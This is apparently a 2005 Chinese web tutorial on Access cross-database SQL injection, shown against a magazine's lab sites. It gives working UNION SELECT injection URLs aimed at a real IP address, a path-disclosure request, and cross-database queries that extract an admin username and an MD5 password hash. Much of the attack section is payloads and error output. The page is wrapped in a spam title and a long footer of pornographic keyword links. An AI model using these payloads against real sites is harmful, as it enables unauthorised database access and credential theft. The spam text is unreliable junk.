国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關(guān)注微信公眾號(hào)

Access的跨庫查詢
2005-12-17   

    大家還記得mssql的跨庫查詢吧,其實(shí)在access中也可以實(shí)現(xiàn)2個(gè)數(shù)據(jù)之間的交叉查詢。下面我就給大家介紹下access的跨庫查詢。

首先讓我們看看在access里是怎樣實(shí)現(xiàn)對(duì)mdb文件進(jìn)行查詢的,我們隨便創(chuàng)建個(gè)空數(shù)據(jù)庫,對(duì)數(shù)據(jù)庫D:\daos\db\daidalos.mdb里的admin表的內(nèi)容進(jìn)行查詢,SQL語句為:

SELECT * from admin in "D:\daos\db\daidalos.mdb"

 


查詢后,成功返回目標(biāo)數(shù)據(jù)庫里表admin表里的內(nèi)容:


在實(shí)際的asp注射中,要同時(shí)進(jìn)行2個(gè)select,如果大家熟悉php+mysql注射的話,應(yīng)該很容易想到使用union進(jìn)行聯(lián)合查詢,在access里我們照樣可以使用,使用union查詢還有一個(gè)好處就是不要去對(duì)數(shù)據(jù)進(jìn)行一個(gè)一個(gè)字符的去猜,而可以象mysql+php注射一樣直接暴出字段里的數(shù)據(jù)(具體的mix已經(jīng)寫了一篇詳細(xì)的文章)。從上面可以看出來要實(shí)現(xiàn)跨庫查詢必修要下面2個(gè)條件:

條件1我們可以根據(jù)提示錯(cuò)誤信息來手工猜解,也可以通過程序自動(dòng)實(shí)現(xiàn)。

條件2 這個(gè)是個(gè)難點(diǎn),不過我們可以通過利用“access暴庫”來實(shí)現(xiàn),有人會(huì)說既然可以知道數(shù)據(jù)位置,那不直接下載得拉,其實(shí)不然,現(xiàn)在的數(shù)據(jù)庫一般防止下載,有的根本不web目錄下。

在黑防第四輪實(shí)驗(yàn)室的第一關(guān),就是設(shè)置的2個(gè)asp+access的下載系統(tǒng),一個(gè)是雨點(diǎn)下載系統(tǒng),一個(gè)是盜帥下載系統(tǒng)。 經(jīng)過測(cè)試 盜帥下載系統(tǒng)可以暴出數(shù)據(jù)庫但是不讓下載,似乎也沒什么地方可以注射,而雨點(diǎn)下載系統(tǒng)就是漏洞百出了,數(shù)據(jù)庫可以暴且可以直接下載,還可以注射。不過雨點(diǎn)的后臺(tái)很簡(jiǎn)單,沒什么可以利用的地方,我們的目標(biāo)就放在得到盜帥后臺(tái)密碼上了,下面我就給大家演示下,通過雨點(diǎn)系統(tǒng)的注射點(diǎn)對(duì)盜帥系統(tǒng)的跨庫查詢而得到盜帥的后臺(tái)密碼:

我們得知雨點(diǎn)系統(tǒng)的list.asp可以注射,我們先去要得到union里的數(shù)據(jù)表字段數(shù),提交:

http://219.237.81.46/yddown/list.asp?id=75%20union%20select%201%20from%20userinfo

返回:

Microsoft JET Database Engine 錯(cuò)誤 '80040e14'

在聯(lián)合查詢中所選定的兩個(gè)數(shù)據(jù)表或查詢中的列數(shù)不匹配。

/yddown/list.asp,行51

字段不對(duì),我寫了個(gè)perl腳本自動(dòng)猜,(代碼見后)

當(dāng)我們提交:

http://219.237.81.46/yddown/list.asp?id=75%20union%20select%201,2,3%20from%20userinfo

無錯(cuò)誤返回:


 


哈哈! 我們已經(jīng)得到字段數(shù)了,并且我們可以得到在字段1的我位置,可以顯示我們查詢的數(shù)據(jù)。

現(xiàn)在還就差盜帥的數(shù)據(jù)庫位置了,簡(jiǎn)單我們暴庫,提交:

http://219.237.81.46/dsdown%5cregs.asp

成功返回路徑:

Microsoft JET Database Engine 錯(cuò)誤 '80004005'

'D:\111\db\kljdsld.asa'不是一個(gè)有效的路徑。 確定路徑名稱拼寫是否正確,以及是否連接到文件存放的服務(wù)器。

/dsdown/db/user.asp,行6

(注意:這樣得到的的路徑不一定是“完整”的,真正的路徑為:D:\111\dsdown\db\kljdsld.asa)

下面我們跨庫,構(gòu)造url如下:

http://219.237.81.46/yddown/list.asp?id=75%20union%20select%20admin,3,2%20from%20admin%20in%20"D:\111\dsdown\db\kljdsld.asa"%20where%20id=1

上面的語句是,union查詢數(shù)據(jù)D:\111\db\kljdsld.asa里表admin里id=1的字段admin的數(shù)據(jù),如果成功將直接暴出后臺(tái)管理的用戶名:


得到用戶名為admin 我們接著暴密碼:

http://219.237.81.46/yddown/list.asp?id=75%20union%20select%20pws,3,2%20from%20admin%20in%20"D:\111\dsdown\db\kljdsld.asa"%20where%20id=1

如圖:


得到密碼為32位的md5加密的hash:77e6cbb3f9468eadb655ae6826357922,我們跨庫查詢成功,這里我只是為大家演示下跨庫查詢,黑防那里就不管咯 : )。

小結(jié)

本文主要是給大家介紹了2個(gè)非常有用的方法,第1 我們?cè)赼sp注射時(shí)不一頂要一個(gè)個(gè)字符去猜,那樣遇到中文的很麻煩,直接用union替代數(shù)據(jù)可以直接暴出數(shù)據(jù),不關(guān)是中文還是特殊字符,都可以一步到位,第2 就是跨庫了,使用很靈活,可以讓你在滲透時(shí),有意想不到的收獲。


熱詞搜索:

上一篇:用telnet的方法導(dǎo)出、導(dǎo)入論壇mysql數(shù)據(jù)庫
下一篇:用Winsock實(shí)現(xiàn)對(duì)網(wǎng)站數(shù)據(jù)庫的數(shù)據(jù)注入

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
国产最新精品免费| 欧美日韩亚洲不卡| 欧美一区二区啪啪| 麻豆精品视频在线观看视频| 日韩视频在线永久播放| 久久成人羞羞网站| 国产亚洲1区2区3区| 成人午夜电影网站| 日韩美女视频19| 在线播放中文字幕一区| 日韩精品亚洲一区二区三区免费| 777a∨成人精品桃花网| 国内精品伊人久久久久av一坑 | 精品入口麻豆88视频| 国产精品99精品久久免费| 亚洲人快播电影网| 精品国产一区二区三区忘忧草| 成人在线视频一区| 亚洲尤物视频在线| 精品91自产拍在线观看一区| 91视频观看免费| 激情久久五月天| 亚洲高清久久久| 国产精品第13页| 久久综合999| 欧美一区二区在线不卡| 97精品久久久久中文字幕| 久久电影网站中文字幕 | 奇米精品一区二区三区在线观看一| 久久综合久色欧美综合狠狠| 色成年激情久久综合| 国产乱人伦精品一区二区在线观看| 亚洲电影视频在线| 亚洲素人一区二区| 国产精品护士白丝一区av| 26uuu色噜噜精品一区| 欧美日韩你懂的| 色老头久久综合| 成人av在线播放网址| 国产成人高清在线| 国产乱码一区二区三区| 国产美女视频91| 蜜臀av性久久久久av蜜臀妖精| 一区二区三区四区视频精品免费| 国产欧美va欧美不卡在线| wwwwww.欧美系列| 久久九九99视频| 久久综合九色综合欧美就去吻| 91麻豆精品国产无毒不卡在线观看 | 精品捆绑美女sm三区| 欧美一区二区三区小说| 91精品国产综合久久国产大片| 欧美日本一区二区三区四区| 欧美日韩国产电影| 欧美精品日韩综合在线| 欧美精品乱码久久久久久按摩| 精品视频在线看| 91精品国产综合久久久久久 | aaa欧美色吧激情视频| 国产久卡久卡久卡久卡视频精品| 日本特黄久久久高潮| 久久疯狂做爰流白浆xx| 国产成人av影院| 99久久免费视频.com| 91美女在线视频| 欧美日韩精品一区二区天天拍小说| 91国产精品成人| 7777精品伊人久久久大香线蕉超级流畅 | 国产成人99久久亚洲综合精品| 国产在线麻豆精品观看| 成年人国产精品| 欧美日韩一区二区三区四区| 欧美伦理电影网| 日韩欧美中文一区| 日本一区二区三区国色天香| 1区2区3区国产精品| 午夜久久久久久久久久一区二区| 日本vs亚洲vs韩国一区三区二区| 国产福利视频一区二区三区| 99精品欧美一区二区三区小说| 欧美网站大全在线观看| 精品国产乱码久久久久久1区2区| 国产日韩一级二级三级| 亚洲成人av福利| 国产成人精品免费看| 欧美三级乱人伦电影| 国产无遮挡一区二区三区毛片日本| 国产精品家庭影院| 日韩av电影一区| 99久久精品免费| 91精品国产91久久久久久一区二区| 国产亚洲欧美色| 视频一区中文字幕国产| www.在线欧美| 日韩午夜av一区| 亚洲综合一区二区三区| 国产九色sp调教91| 4438成人网| 亚洲色图.com| 国产精品亚洲一区二区三区妖精| 欧美性三三影院| 国产精品传媒入口麻豆| 激情欧美一区二区三区在线观看| 欧美日韩一区久久| 悠悠色在线精品| 成人动漫av在线| 久久综合久久综合久久| 日韩福利视频导航| 欧洲一区二区三区免费视频| 国产丝袜美腿一区二区三区| 丝袜美腿亚洲综合| 欧美日韩免费观看一区二区三区| 国产精品美日韩| 国产精品2024| 久久天堂av综合合色蜜桃网| 日韩中文字幕麻豆| 欧美精品777| 午夜在线电影亚洲一区| 日本大香伊一区二区三区| 中文字幕亚洲精品在线观看| 成人性生交大片免费看在线播放| 精品免费视频一区二区| 精品一区二区三区av| 精品乱码亚洲一区二区不卡| 久久精品久久精品| 欧美大度的电影原声| 久久草av在线| 久久久久久久精| 高清不卡一二三区| 国产精品日日摸夜夜摸av| 国产精品自拍一区| 中文字幕av资源一区| 成人免费av资源| 中文字幕中文在线不卡住| 99久久综合狠狠综合久久| 18成人在线视频| 欧美性视频一区二区三区| 五月激情六月综合| 精品免费视频.| 成年人午夜久久久| 夜夜夜精品看看| 欧美电影一区二区三区| 日本不卡的三区四区五区| 欧美成人aa大片| 懂色av中文一区二区三区| 国产精品色哟哟网站| av成人免费在线观看| 亚洲一区在线视频观看| 日韩一区二区三| 国产成人精品网址| 亚洲精品乱码久久久久久久久 | 欧美日韩视频一区二区| 亚洲高清一区二区三区| 精品精品国产高清a毛片牛牛| 国产老妇另类xxxxx| 亚洲少妇中出一区| 欧美一区二区三区在线电影| 国产经典欧美精品| 亚洲综合一区二区精品导航| 91精品国产综合久久蜜臀| 国产91丝袜在线播放九色| 亚洲一二三区视频在线观看| 日韩欧美亚洲一区二区| 91视频一区二区| 久久精品国产秦先生| 日韩毛片在线免费观看| 亚洲精品在线电影| 91视视频在线观看入口直接观看www| 午夜精品久久久久影视| 久久久精品影视| 在线播放中文字幕一区| www.亚洲精品| 国内外精品视频| 日一区二区三区| 中文字幕一区av| 久久影院视频免费| 欧美一区二区三区视频在线| 99综合影院在线| 国产一区二区毛片| 日韩精品电影在线| 亚洲图片欧美色图| 国产精品国产精品国产专区不片| 91精品国产一区二区| 色综合久久天天| 粉嫩aⅴ一区二区三区四区五区| 天天av天天翘天天综合网色鬼国产| 国产精品久久久久aaaa| 久久日一线二线三线suv| 欧美日免费三级在线| 97成人超碰视| 99久久免费精品| 大白屁股一区二区视频| 国产一区二区按摩在线观看| 蜜臀久久99精品久久久久久9 | 91网址在线看| 成人综合在线网站| 国产精品性做久久久久久| 九色综合国产一区二区三区| 日本va欧美va瓶| 麻豆精品视频在线观看|